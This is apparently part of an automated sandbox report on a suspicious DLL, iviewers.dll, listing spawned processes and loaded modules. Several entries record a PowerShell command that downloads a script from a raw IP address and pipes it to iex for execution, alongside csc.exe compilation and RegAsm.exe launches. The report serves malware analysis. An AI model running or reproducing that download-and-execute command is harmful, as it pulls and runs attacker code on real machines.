            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7C53.tmp" "c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7CE0.tmp" "c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES83D5.tmp" "c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9337.tmp" "c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES61E6.tmp" "c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES63AB.tmp" "c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C65.tmp" "c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7946.tmp" "c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7C53.tmp" "c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7CE0.tmp" "c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES83D5.tmp" "c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9337.tmp" "c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP"
            Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
